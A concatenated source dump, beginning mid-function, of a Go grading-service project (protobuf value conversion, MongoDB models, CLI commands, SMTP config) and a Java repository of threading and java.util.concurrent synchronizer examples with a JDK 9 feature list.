}, } case int8: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case int32: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case int64: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case uint: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case uint8: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case uint32: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case uint64: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case float32: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case float64: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: v, }, } case string: return &st.Value{ Kind: &st.Value_StringValue{ StringValue: v, }, } case error: return &st.Value{ Kind: &st.Value_StringValue{ StringValue: v.Error(), }, } default: // Fallback to reflection for other types return toValue(reflect.ValueOf(v)) } } func toValue(v reflect.Value) *st.Value { switch v.Kind() { case reflect.Bool: return &st.Value{ Kind: &st.Value_BoolValue{ BoolValue: v.Bool(), }, } case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v.Int()), }, } case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v.Uint()), }, } case reflect.Float32, reflect.Float64: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: v.Float(), }, } case reflect.Ptr: if v.IsNil() { return nil } return toValue(reflect.Indirect(v)) case reflect.Array, reflect.Slice: size := v.Len() if size == 0 { return nil } values := make([]*st.Value, size) for i := 0; i < size; i++ { values[i] = toValue(v.Index(i)) } return &st.Value{ Kind: &st.Value_ListValue{ ListValue: &st.ListValue{ Values: values, }, }, } case reflect.Struct: t := v.Type() size := v.NumField() if size == 0 { return nil } fields := make(map[string]*st.Value, size) for i := 0; i < size; i++ { name := t.Field(i).Name // Better way? if len(name) > 0 && 'A' <= name[0] && name[0] <= 'Z' { fields[name] = toValue(v.Field(i)) } } if len(fields) == 0 { return nil } return &st.Value{ Kind: &st.Value_StructValue{ StructValue: &st.Struct{ Fields: fields, }, }, } case reflect.Map: keys := v.MapKeys() if len(keys) == 0 { return nil } fields := make(map[string]*st.Value, len(keys)) for _, k := range keys { if k.Kind() == reflect.String { fields[k.String()] = toValue(v.MapIndex(k)) } } if len(fields) == 0 { return nil } return &st.Value{ Kind: &st.Value_StructValue{ StructValue: &st.Struct{ Fields: fields, }, }, } default: // Last resort return &st.Value{ Kind: &st.Value_StringValue{ StringValue: fmt.Sprint(v), }, } } } <file_sep>package model import ( pb "github.com/argcv/go-argcvapis/app/manul/secret" "github.com/argcv/manul/client/mongo" "gopkg.in/mgo.v2/bson" "time" ) type Secret struct { Id bson.ObjectId `bson:"_id,omitempty" json:"id"` UserId bson.ObjectId `bson:"user_id,omitempty" json:"user_id"` Secret string `bson:"secret,omitempty" json:"secret"` TempToken string `bson:"temp_token,omitempty" json:"temp_token"` CreateTime time.Time `bson:"create_time,omitempty" json:"create_time,omitempty"` UpdatedTime time.Time `bson:"updated_time,omitempty" json:"updated_time,omitempty"` } func (u *Secret) UpdateTime() *Secret { if u.CreateTime == time.Unix(0, 0) { u.CreateTime = time.Now() } u.UpdatedTime = time.Now() return u } func (u *Secret) ToPbSecret() (pbSecret *pb.Secret) { pbSecret = &pb.Secret{ UserId: u.UserId.Hex(), Secret: u.Secret, } return } func FromPbSecret(u *pb.Secret) *Secret { return &Secret{ UserId: mongo.SafeToObjectIdOrEmpty(u.UserId), Secret: u.Secret, } } <file_sep>package client import ( "github.com/argcv/go-argcvapis/app/manul/file" "github.com/argcv/go-argcvapis/app/manul/project" "github.com/argcv/manul/client/workdir" "github.com/argcv/manul/config" "github.com/argcv/webeh/log" "github.com/davecgh/go-spew/spew" "github.com/spf13/cobra" "golang.org/x/net/context" "os" "path" "time" ) func NewManulProjectSubmitCommand() *cobra.Command { cmd := &cobra.Command{ Use: "submit", Short: "Create a new project", RunE: func(cmd *cobra.Command, args []string) (err error) { conn := NewGrpcConn() defer conn.Close() pcli := conn.NewProjectCli() ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) defer cancel() auth := config.GetAuthInfo() files := &file.Files{} dir, _ := cmd.Flags().GetString("dir") dir = path.Clean(dir) base, _ := os.Getwd() if dir[0] != '/' { // relative path dir = path.Join(base, dir) } fs := workdir.NewWorkdir(dir) _, lastDir := fs.Split() name, _ := cmd.Flags().GetString("name") desc, _ := cmd.Flags().GetString("desc") if name == "" { name = lastDir } log.Infof("user: %v", auth.Name) log.Infof("name: %v", name) log.Infof("desc: %v", desc) log.Infof("base: %v", fs.GetCwd()) fs.IterFiles("/", func(f *file.File) error { log.Infof("file: [%v], [%v]", f.Path, f.Name) files.Data = append(files.Data, f) return nil }) p := &project.Project{ Name: name, Desc: desc, Files: files, } req := &project.CreateProjectRequest{ Auth: auth, Project: p, } if ret, err := pcli.CreateProject(ctx, req); err != nil { log.Infof("Error: %v", err) } else { log.Infof("Dump: %v", spew.Sdump(ret)) } return }, } cmd.PersistentFlags().StringP("dir", "d", ".", "project base dir") cmd.PersistentFlags().StringP("name", "n", "", "project name") cmd.PersistentFlags().String("desc", "", "project description") return cmd } func NewManulProjectCommand() *cobra.Command { cmd := &cobra.Command{ Use: "project", Short: "Project Operations", PreRunE: func(cmd *cobra.Command, args []string) (err error) { return nil }, } cmd.AddCommand( NewManulProjectSubmitCommand(), ) return cmd } <file_sep>package shell import ( "github.com/spf13/cobra" ) func NewShellCommand() *cobra.Command { cmd := &cobra.Command{ Use: "shell", Short: "A simple interactive interface", RunE: func(cmd *cobra.Command, args []string) (err error) { env := NewEnv() env.Run() return }, } return cmd } func NewSetupCommand() *cobra.Command { cmd := &cobra.Command{ Use: "setup", Short: "setup server environment (not for client side)", RunE: func(cmd *cobra.Command, args []string) (err error) { env := NewEnv() env.Process("setup") return }, } return cmd } func NewLoginCommand() *cobra.Command { cmd := &cobra.Command{ Use: "login", Short: "user login", RunE: func(cmd *cobra.Command, args []string) (err error) { env := NewEnv() env.Process(append([]string{"login"}, args...)...) return }, } return cmd } <file_sep>package model import ( pb "github.com/argcv/go-argcvapis/app/manul/job" "github.com/argcv/manul/client/mongo" "gopkg.in/mgo.v2/bson" ) type Job struct { Id bson.ObjectId `bson:"_id,omitempty" json:"id"` ProjectId bson.ObjectId `bson:"project_id,omitempty" json:"project_id,omitempty"` UserId bson.ObjectId `bson:"user_id,omitempty" json:"user_id,omitempty"` Progress pb.JobProgress `bson:"progress,omitempty" json:"progress,omitempty"` Score int32 `bson:"score,omitempty" json:"score,omitempty"` Log string `bson:"log,omitempty" json:"log,omitempty"` Error *Status `bson:"error,omitempty" json:"error,omitempty"` } func NewJob(uid bson.ObjectId, pid bson.ObjectId) *Job { jid := mongo.NewObjectId() job := &Job{ Id: jid, UserId: uid, ProjectId: pid, Progress: pb.JobProgress_CREATED, Score: 0, Log: "", Error: nil, } return job } // from pb & to pb func (j *Job) ToPbJob() (pbJob *pb.Job) { result := &pb.JobResult{ Score: j.Score, } if j.Error != nil { result.Error = j.Error.ToPbStatus() } pbJob = &pb.Job{ Id: j.Id.Hex(), ProjectId: j.ProjectId.Hex(), UserId: j.UserId.Hex(), Progress: j.Progress, Result: result, Logs: j.Log, } return } func FromPbJob(j *pb.Job) *Job { var score int32 = 0 var err *Status = nil if j.Result != nil { score = j.Result.Score err = FromPbStatus(j.Result.Error) } return &Job{ Id: mongo.SafeToObjectIdOrEmpty(j.Id), ProjectId: mongo.SafeToObjectIdOrEmpty(j.ProjectId), UserId: mongo.SafeToObjectIdOrEmpty(j.UserId), Progress: j.Progress, Score: score, Log: j.Logs, Error: err, } } <file_sep>package helpers import "math/rand" func DistinctStrings(elems ...string) []string { m := map[string]bool{} for _, e := range elems { m[e] = true } var retElems []string for e, _ := range m { retElems = append(retElems, e) } return retElems } var ( CharsetCharUpperCase = []rune("ABCDEFGHIJKLMNOPARSTUVWXYZ") CharsetCharLowerCase = []rune("abcdefghijklmnopqrstuvwxyz") CharsetChars = append(CharsetCharUpperCase, CharsetCharLowerCase...) CharsetDigit = []rune("0123456789") CharsetCharDigit = append(CharsetChars, CharsetDigit...) CharsetHex = []rune("0123456789abcdef") ) func RandomString(size int, charset []rune) string { szChar := len(charset) if szChar == 0 { return "" } var buff []rune for i := 0; i < size; i++ { idx := rand.Intn(szChar) buff = append(buff, charset[idx]) } return string(buff) } <file_sep>package config import ( "fmt" "strings" ) type SMTPAuth struct { Username string Password string } func GetSMTPAuth() *SMTPAuth { if getBoolOrDefault(KeyMailSMTPPerformAuth, false) { // with auth user := getStringOrDefault(KeyMailSMTPUserName, "") pass := getStringOrDefault(KeyMailSMTPPassword, "") return &SMTPAuth{ Username: user, Password: <PASSWORD>, } } return nil } type SMTPConfig struct { Host string Port int Sender string DefaultFrom string InsecureSkipVerify bool Auth *SMTPAuth } func (c *SMTPConfig) GetUsername() string { if c.Auth == nil { return "" } else { return c.Auth.Username } } func (c *SMTPConfig) GetPassword() string { if c.Auth == nil { return "" } else { return c.Auth.Password } } func GetSMTPConfig() (cfg *SMTPConfig) { cfg = &SMTPConfig{ Host: getStringOrDefault(KeyMailSMTPHost, ""), Port: getIntOrDefault(KeyMailSMTPPort, 0), Sender: getStringOrDefault(KeyMailSMTPUserSender, ""), InsecureSkipVerify: getBoolOrDefault(KeyMailSMTPInsecureSkipVerify, false), Auth: GetSMTPAuth(), } if cfg.Auth != nil && cfg.DefaultFrom == "" { if strings.Contains(cfg.Auth.Username, "@") { cfg.DefaultFrom = cfg.Auth.Username } else { cfg.DefaultFrom = fmt.Sprintf("%s@%s", cfg.Auth.Username, cfg.Host) } } return }
ae511e490cc6c13686831dd08df5acfd173f9d11
[ "YAML", "Markdown", "Go", "Dockerfile", "Shell" ]
50
YAML
argcv/manul
05a0a08e90a71c132f7d08cadb4e992e5d83b619
dce58d764d303c84c74ecb3efc9a6a0fd334e7f5
refs/heads/master
<repo_name>Spectred/flame-java<file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/phaser/PhaserThread.java package com.spectred.synchronizer.phaser; import java.util.concurrent.Phaser; public class PhaserThread implements Runnable { private Phaser phaser; public PhaserThread(Phaser phaser) { this.phaser = phaser; } @Override public void run() { System.out.println(Thread.currentThread().getName() + " - 阶段: 0"); phaser.arriveAndAwaitAdvance(); System.out.println(Thread.currentThread().getName() + " - 阶段: 1"); phaser.arriveAndAwaitAdvance(); System.out.println(Thread.currentThread().getName() + " - 阶段: 2"); phaser.arriveAndAwaitAdvance(); } } <file_sep>/thread-java/src/main/java/com/spectred/thread/create/MyThreadPool.java package com.spectred.thread.create; import java.util.concurrent.ExecutorService; import java.util.concurrent.Executors; /** * 线程的创建 * <p>通过线程池创建</p> * 之后会有详细说明 * * @author SWD */ public class MyThreadPool { public static void main(String[] args) { // 通过Executors创建线程池 - ExecutorService executorService = Executors.newCachedThreadPool(); executorService.submit(() -> System.out.println(Thread.currentThread().getName())); executorService.submit(() -> System.out.println(Thread.currentThread().getName())); executorService.submit(() -> System.out.println(Thread.currentThread().getName())); executorService.shutdown(); } } <file_sep>/thread-java/src/main/java/com/spectred/thread/create/MyRunnable.java package com.spectred.thread.create; /** * 线程的创建 * <p>实现Runnable接口</p> * * @author SWD */ public class MyRunnable implements Runnable { @Override public void run() { System.out.println(Thread.currentThread().getName() + " is running ..."); } public static void main(String[] args) { new Thread(new MyRunnable(), "Thread-MyRunnableThread").start(); } } <file_sep>/thread-java/src/test/java/com/spectred/AppTest.java package com.spectred; import static org.junit.Assert.assertTrue; import org.junit.Test; import java.util.ArrayList; import java.util.List; /** * Unit test for simple App. */ public class AppTest { /** * Rigorous Test :-) */ @Test public void shouldAnswerWithTrue() { List<Integer> l=new ArrayList<>(); for (int i = 0; i <10 ; i++) { l.add(i); } List<Integer> integers = l.subList(0, 3); System.out.println(integers); assertTrue(true); } } <file_sep>/feature-java/java-9/README.md ## Java9 特性 ### 0. 官方文档与参考链接 ```http https://docs.oracle.com/javase/9/ ``` ```http http://openjdk.java.net/projects/jdk9/ ``` ### 1. 重要特性 #### 1.1 模块化 #### 1.2 进程API改进 #### .3 REPL(JShell) #### 1.4 接口的私有方法 #### 1.5 多版本兼容jar #### 1.6 钻石操作符更新 #### 1.7 try结构更新 #### 1.8 String存储结构更新 #### 1.9 只读集合 #### 1.10 增强的Stream API #### 1.11 Optional提供Stream API #### 1.12 多分辨率图像API #### 1.13 Http/2 Client #### 1.14 Deprecated API #### 1.15 智能Java编译工具 #### 1.16 统一的JVM日志 #### 1.17 java doc 的HTML支持 #### 1.18 动态编译器 ### 附 特性一览 102: [Process API Updates](http://openjdk.java.net/jeps/102) <<<<<<< HEAD 110: [HTTP 2 Client](http://openjdk.java.net/jeps/110) 143: [Improve Contended Locking ](http://openjdk.java.net/jeps/143) 158: [Unified JVM Logging](http://openjdk.java.net/jeps/158) 165: [Compiler Control](http://openjdk.java.net/jeps/165) 193: [Variable Handles](http://openjdk.java.net/jeps/193) 197: [Segmented Code Cache](http://openjdk.java.net/jeps/197) 199: [Smart Java Compilation, Phase Two](http://openjdk.java.net/jeps/199) 200: [The Modular JDK](http://openjdk.java.net/jeps/200) 201: [Modular Source Code](http://openjdk.java.net/jeps/201) 211: [Elide Deprecation Warnings on Import Statements](http://openjdk.java.net/jeps/211) 212: [Resolve Lint and Doclint Warnings](http://openjdk.java.net/jeps/212) 213: [Milling Project Coin](http://openjdk.java.net/jeps/213) 214: [Remove GC Combinations Deprecated in JDK 8](http://openjdk.java.net/jeps/214) 215: [Tiered Attribution for javac](http://openjdk.java.net/jeps/215) 216: [Process Import Statements Correctly](http://openjdk.java.net/jeps/216) 217: [Annotations Pipeline 2.0](http://openjdk.java.net/jeps/217) 219: [Datagram Transport Layer Security (DTLS)](http://openjdk.java.net/jeps/219) 220: [Modular Run-Time Images](http://openjdk.java.net/jeps/220) 221: [Simplified Doclet API](http://openjdk.java.net/jeps/221) 222: [jshell: The Java Shell (Read-Eval-Print Loop)](http://openjdk.java.net/jeps/222) 223: [New Version-String Scheme](http://openjdk.java.net/jeps/223) 224: [HTML5 Javadoc](http://openjdk.java.net/jeps/224) 225: [Javadoc Search](http://openjdk.java.net/jeps/225) 226: [UTF-8 Property Files](http://openjdk.java.net/jeps/226) 227: [Unicode 7.0](http://openjdk.java.net/jeps/227) 228: [Add More Diagnostic Commands](http://openjdk.java.net/jeps/228) 229: [Create PKCS12 Keystores by Default](http://openjdk.java.net/jeps/229) 231: [Remove Launch-Time JRE Version Selection](http://openjdk.java.net/jeps/231) 232: [Improve Secure Application Performance](http://openjdk.java.net/jeps/232) 233: [Generate Run-Time Compiler Tests Automatically](http://openjdk.java.net/jeps/233) 235: [Test Class-File Attributes Generated by javac](http://openjdk.java.net/jeps/235) 236: [Parser API for Nashorn](http://openjdk.java.net/jeps/236) 237: [Linux/AArch64 Port](http://openjdk.java.net/jeps/237) 238: [Multi-Release JAR Files](http://openjdk.java.net/jeps/238) 240: [Remove the JVM TI hprof Agent](http://openjdk.java.net/jeps/240) 241: [Remove the jhat Tool](http://openjdk.java.net/jeps/241) 243: [Java-Level JVM Compiler Interface](http://openjdk.java.net/jeps/243) 244: [TLS Application-Layer Protocol Negotiation Extension](http://openjdk.java.net/jeps/244) 245: [Validate JVM Command-Line Flag Arguments](http://openjdk.java.net/jeps/245) 246: [Leverage CPU Instructions for GHASH and RSA](http://openjdk.java.net/jeps/246) 247: [Compile for Older Platform Versions](http://openjdk.java.net/jeps/247) 248: [Make G1 the Default Garbage Collector](http://openjdk.java.net/jeps/248) 249: [OCSP Stapling for TLS](http://openjdk.java.net/jeps/249) 250: [Store Interned Strings in CDS Archives](http://openjdk.java.net/jeps/250) 251: [Multi-Resolution Images](http://openjdk.java.net/jeps/251) 252: [Use CLDR Locale Data by Default](http://openjdk.java.net/jeps/252) 253: [Prepare JavaFX UI Controls & CSS APIs for Modularization](http://openjdk.java.net/jeps/253) 254: [Compact Strings](http://openjdk.java.net/jeps/254) 255: [Merge Selected Xerces 2.11.0 Updates into JAXP](http://openjdk.java.net/jeps/255) 256: [BeanInfo Annotations](http://openjdk.java.net/jeps/256) 257: [Update JavaFX/Media to Newer Version of GStreamer](http://openjdk.java.net/jeps/257) 258: [HarfBuzz Font-Layout Engine](http://openjdk.java.net/jeps/258) 259: [Stack-Walking API](http://openjdk.java.net/jeps/259) 260: [Encapsulate Most Internal APIs](http://openjdk.java.net/jeps/260) 261: [Module System](http://openjdk.java.net/jeps/261) 262: [TIFF Image I/O](http://openjdk.java.net/jeps/262) 263: [HiDPI Graphics on Windows and Linux](http://openjdk.java.net/jeps/263) 264: [Platform Logging API and Service](http://openjdk.java.net/jeps/264) 265: [Marlin Graphics Renderer](http://openjdk.java.net/jeps/265) 266: [More Concurrency Updates](http://openjdk.java.net/jeps/266) 267: [Unicode 8.0](http://openjdk.java.net/jeps/267) 268: [XML Catalogs](http://openjdk.java.net/jeps/268) 269: [Convenience Factory Methods for Collections](http://openjdk.java.net/jeps/269) 270: [Reserved Stack Areas for Critical Sections](http://openjdk.java.net/jeps/270) 271: [Unified GC Logging](http://openjdk.java.net/jeps/271) 272: [Platform-Specific Desktop Features](http://openjdk.java.net/jeps/272) 273: [DRBG-Based SecureRandom Implementations](http://openjdk.java.net/jeps/273) 274: [Enhanced Method Handles](http://openjdk.java.net/jeps/274) 275: [Modular Java Application Packaging](http://openjdk.java.net/jeps/275) 276: [Dynamic Linking of Language-Defined Object Models](http://openjdk.java.net/jeps/276) 277: [Enhanced Deprecation](http://openjdk.java.net/jeps/277) 278: [Additional Tests for Humongous Objects in G1](http://openjdk.java.net/jeps/278) 279: [Improve Test-Failure Troubleshooting](http://openjdk.java.net/jeps/279) 280: [Indify String Concatenation](http://openjdk.java.net/jeps/280) 281: [HotSpot C++ Unit-Test Framework](http://openjdk.java.net/jeps/281) 282: [jlink: The Java Linker](http://openjdk.java.net/jeps/282) 283: [Enable GTK 3 on Linux](http://openjdk.java.net/jeps/283) 284: [New HotSpot Build System](http://openjdk.java.net/jeps/284) 285: [Spin-Wait Hints](http://openjdk.java.net/jeps/285) 287: [SHA-3 Hash Algorithms](http://openjdk.java.net/jeps/287) 288: [Disable SHA-1 Certificates](http://openjdk.java.net/jeps/288) 289: [Deprecate the Applet API](http://openjdk.java.net/jeps/289) 290: [Filter Incoming Serialization Data](http://openjdk.java.net/jeps/290) 291: [Deprecate the Concurrent Mark Sweep (CMS) Garbage Collector](http://openjdk.java.net/jeps/291) 292: [Implement Selected ECMAScript 6 Features in Nashorn](http://openjdk.java.net/jeps/292) 294: [Linux/s390x Port](http://openjdk.java.net/jeps/294) 295: [Ahead-of-Time Compilation](http://openjdk.java.net/jeps/295) 297: [Unified arm32/arm64 Port](http://openjdk.java.net/jeps/297) 298: [Remove Demos and Samples](http://openjdk.java.net/jeps/298) 299: [Reorganize Documentation](http://openjdk.java.net/jeps/299)<file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/semaphore/SemaphoreTest.java package com.spectred.synchronizer.semaphore; import java.util.Objects; import java.util.concurrent.Semaphore; /** * 信号量 * items为共享资源,当线程尝试使用共享资源时,先要求线程获取许可(acquire()),线程拥有了权限,否则等待, * 使用完资源后,调用release()释放许可 * * 对于共享资源的访问需要用锁来控制,信号量仅仅保证线程有使用权限,其中的并发问题由锁来保证 * * 许可数量不大于0代表共享资源不可用,许可数大于0代表资源可用,且多个线程可以同时访问共享资源 * @author SWD */ public class SemaphoreTest { /** * 可同时访问资源的最大线程数 */ private static final int MAX_AVAILABLE = 100; private final Semaphore available = new Semaphore(MAX_AVAILABLE, true); /** * 共享资源 */ protected Object[] items = new Object[MAX_AVAILABLE]; private boolean[] used = new boolean[MAX_AVAILABLE]; public Object getItem() throws InterruptedException { available.acquire(); return getNextAvailableItem(); } public void putItem(Object x) { if (markAsUsed(x)) { available.release(); } } private synchronized Object getNextAvailableItem() { for (int i = 0; i < MAX_AVAILABLE; i++) { if (!used[i]) { used[i] = true; return items[i]; } } return null; } private synchronized boolean markAsUsed(Object item) { for (int i = 0; i < MAX_AVAILABLE; i++) { if (Objects.equals(item, items[i])) { if (used[i]) { used[i] = false; return true; } else { return false; } } } return false; } } <file_sep>/feature-java/java-9/java9/src/test/java/com/spectred/feature/HTTP2ClientTest.java package com.spectred.feature; import jdk.incubator.http.HttpClient; import jdk.incubator.http.HttpRequest; import jdk.incubator.http.HttpResponse; import org.junit.Test; import java.io.IOException; import java.net.URI; import java.net.URISyntaxException; /** * HTTP/2 Client(孵化中) * 孵化中的API,等待后续版本更新... * <a href="http://openjdk.java.net/jeps/110">JEP 110: HTTP/2 Client (Incubator)</a> * * @author Spectred */ public class HTTP2ClientTest { @Test public void testHTTPClient() throws URISyntaxException, IOException, InterruptedException { // HttpClient httpClient = HttpClient.newHttpClient(); // HttpResponse<String> response = httpClient.send( // HttpRequest.newBuilder(new URI("https://www.google.com/")).GET().build(), // HttpResponse.BodyHandler.asString()); // int statusCode = response.statusCode(); // String body = response.body(); // System.out.println("[statusCode]:" + statusCode); // System.out.println("[body]:" + body); } } <file_sep>/feature-java/java-9/java9/src/test/java/com/spectred/feature/JsonTest.java package com.spectred.feature; import org.junit.Test; public class JsonTest { @Test public void testJson(){ } } <file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/cyclicbarrier/CyclicBarrierExceptionTest.java package com.spectred.synchronizer.cyclicbarrier; import java.util.concurrent.BrokenBarrierException; import java.util.concurrent.CyclicBarrier; public class CyclicBarrierExceptionTest { private static final int N = 5; public static void main(String[] args) throws InterruptedException { CyclicBarrier cb = new CyclicBarrier(N, () -> System.out.println("All Over ...")); for (int i = 0; i < N; i++) { Thread t = new Thread(new PrepareWork(cb), "Thread-" + i); t.start(); if (i == 3) { // 中断 t.interrupt(); } } Thread.sleep(3000); System.out.println("Barrier是否损坏:" + cb.isBroken()); } private static class PrepareWork implements Runnable { private CyclicBarrier cb; PrepareWork(CyclicBarrier cb) { this.cb = cb; } @Override public void run() { try { System.out.println(Thread.currentThread().getName() + ": 准备完成"); cb.await(); } catch (InterruptedException e) { System.out.println(Thread.currentThread().getName() + ": 被中断"); } catch (BrokenBarrierException e) { System.out.println(Thread.currentThread().getName() + ": 抛出BrokenBarrierException"); } } } } <file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/README.md ## J.U.C #### 1. synchronizer ##### 1.1 CountDownLatch CountDownLatch是一个辅助同步器类,倒数计数器,计数为0时触发事件。 给定初始计数值`n`,每调用一次`CountDownLatch#countDown()`,`n=n-1`, 调用`CountDownLatch#await()`方法阻塞线程,直到`n=0`. ###### 1.1.1 主线程执行完,再执行子线程 ```java public class CountDownLatchTest { /** * 主线程只有一个线程,当主线程执行完成,开始执行所有的子线程 */ private static final int N = 1; @Test public void testSwitch() { CountDownLatch countDownLatch = new CountDownLatch(N); for (int i = 0; i < 10; i++) { new Thread(new CountDownLatchSwitchRunnable(countDownLatch)).start(); } System.out.println("main done"); // 在调用countDown()的线程打开入口前,所有调用await的线程都一直在入口等待 => 当主线程执行完,再执行子线程 countDownLatch.countDown(); } } class CountDownLatchSwitchRunnable implements Runnable { private CountDownLatch countDownLatch; public CountDownLatchSwitchRunnable(CountDownLatch countDownLatch) { this.countDownLatch = countDownLatch; } @Override public void run() { try { countDownLatch.await(); System.out.println("do something"); } catch (InterruptedException e) { e.printStackTrace(); } } } ``` ###### 1.1.2 子线程执行完,再执行主线程 ```java public class CountDownLatchTest { /** * 子线程数量,当所有的子线程执行完成,开始执行主线程 */ private static final int M = 10; @Test public void testSignal() throws InterruptedException { CountDownLatch countDownLatch = new CountDownLatch(M); for (int i = 0; i < M; i++) { new Thread(new CountDownLatchSignalRunnable(countDownLatch)).start(); } countDownLatch.await(); // 保证在此之后的代码继续执行=>所有子线程执行完,再执行主线程 System.out.println("main done"); } } class CountDownLatchSignalRunnable implements Runnable { private final CountDownLatch countDownLatch; public CountDownLatchSignalRunnable(CountDownLatch countDownLatch) { this.countDownLatch = countDownLatch; } @Override public void run() { System.out.println(Thread.currentThread().getName()); countDownLatch.countDown(); } } ``` ##### 1.2 CyclicBarrier CyclicBarrier是一个辅助同步器,**让线程达到栅栏时被阻塞(调用await()方法),直到到达栅栏的线程数满足指定的数量要求时,栅栏才会打开放行**。 ###### 1.2.1 基础示例 ```java /** * 循环屏障 */ public class CyclicBarrierTest { private static final int N = 5; public static void main(String[] args) { /* * 当线程数量达到N后开始执行 */ CyclicBarrier cyclicBarrier = new CyclicBarrier(N, () -> System.out.println("All Over ...")); for (int i = 0; i < N; i++) { new Thread(new Worker(cyclicBarrier), "Thread-" + i).start(); } } private static class Worker implements Runnable { private CyclicBarrier cyclicBarrier; public Worker(CyclicBarrier cyclicBarrier) { this.cyclicBarrier = cyclicBarrier; } @Override public void run() { try { Thread.sleep(3000); System.out.println(Thread.currentThread().getName() + " : prepare"); cyclicBarrier.await(); } catch (InterruptedException | BrokenBarrierException e) { e.printStackTrace(); } } } } // --- 预期结果 --- Thread-0 : prepare Thread-1 : prepare Thread-2 : prepare Thread-4 : prepare Thread-3 : prepare All Over ... ``` ###### 1.2.2 CyclicBarrier对异常的处理 ```java public class CyclicBarrierExceptionTest { private static final int N = 5; public static void main(String[] args) throws InterruptedException { CyclicBarrier cb = new CyclicBarrier(N, () -> System.out.println("All Over ...")); for (int i = 0; i < N; i++) { Thread t = new Thread(new PrepareWork(cb), "Thread-" + i); t.start(); if (i == 3) { // 中断 t.interrupt(); } } Thread.sleep(3000); System.out.println("Barrier是否损坏:" + cb.isBroken()); } private static class PrepareWork implements Runnable { private CyclicBarrier cb; PrepareWork(CyclicBarrier cb) { this.cb = cb; } @Override public void run() { try { System.out.println(Thread.currentThread().getName() + ": 准备完成"); cb.await(); } catch (InterruptedException e) { System.out.println(Thread.currentThread().getName() + ": 被中断"); } catch (BrokenBarrierException e) { System.out.println(Thread.currentThread().getName() + ": 抛出BrokenBarrierException"); } } } } // --- 预期结果 --- Thread-0: 准备完成 Thread-3: 准备完成 Thread-1: 准备完成 Thread-2: 准备完成 Thread-4: 准备完成 Thread-4: 抛出BrokenBarrierException Thread-3: 被中断 Thread-0: 抛出BrokenBarrierException Thread-2: 抛出BrokenBarrierException Thread-1: 抛出BrokenBarrierException Barrier是否损坏:true ``` ##### 1.3 Semaphore ##### 1.4 Exchanger ##### 1.5 Phaser<file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/exchanger/ExchangerTest.java package com.spectred.synchronizer.exchanger; import java.util.concurrent.Exchanger; /** * 交换器 * * @author SWD */ public class ExchangerTest { public static void main(String[] args) { Exchanger<String> exchanger = new Exchanger<>(); Thread t1 = new Thread(new Consumer(exchanger), "消费者-T1"); Thread t2 = new Thread(new Producer(exchanger), "生产者-T2"); t1.start(); t2.start(); } } class Producer implements Runnable { private final Exchanger<String> exchanger; public Producer(Exchanger<String> exchanger) { this.exchanger = exchanger; } @Override public void run() { String message = null; for (int i = 0; i < 3; i++) { try { Thread.sleep(1000); message = String.valueOf(i); System.out.println(Thread.currentThread().getName() + " 生产数据==> " + message); String exchange = exchanger.exchange(message); System.out.println(Thread.currentThread().getName() + " 交换得到数据==> " + exchange); } catch (InterruptedException e) { e.printStackTrace(); } } } } class Consumer implements Runnable { private final Exchanger<String> exchanger; public Consumer(Exchanger<String> exchanger) { this.exchanger = exchanger; } @Override public void run() { String msg = null; while (true) { try { Thread.sleep(1000); msg = exchanger.exchange(msg); System.out.println(Thread.currentThread().getName() + " 消费了数据 " + msg); msg=null; } catch (InterruptedException e) { e.printStackTrace(); } } } } <file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/cyclicbarrier/CyclicBarrierTest.java package com.spectred.synchronizer.cyclicbarrier; import java.util.concurrent.BrokenBarrierException; import java.util.concurrent.CyclicBarrier; /** * 循环屏障 */ public class CyclicBarrierTest { private static final int N = 5; public static void main(String[] args) { /* * 当线程数量达到N后开始执行 */ CyclicBarrier cyclicBarrier = new CyclicBarrier(N, () -> System.out.println("All Over ...")); for (int i = 0; i < N; i++) { new Thread(new Worker(cyclicBarrier), "Thread-" + i).start(); } } private static class Worker implements Runnable { private CyclicBarrier cyclicBarrier; public Worker(CyclicBarrier cyclicBarrier) { this.cyclicBarrier = cyclicBarrier; } @Override public void run() { try { Thread.sleep(3000); System.out.println(Thread.currentThread().getName() + " : prepare"); cyclicBarrier.await(); } catch (InterruptedException | BrokenBarrierException e) { e.printStackTrace(); } } } } <file_sep>/README.md # flame-java thread-java 线程 concurrent-java j.u.c feature-java =======
439220f6c2dc55bf70558abb9c8f544e50714c15
[ "Markdown", "Java" ]
13
Java
Spectred/flame-java
3feff233cd5fbbc1994a7160e3904da609098337
fc77e466a80f04dc6ef73e7ef0c105d90f2f480a
refs/heads/master
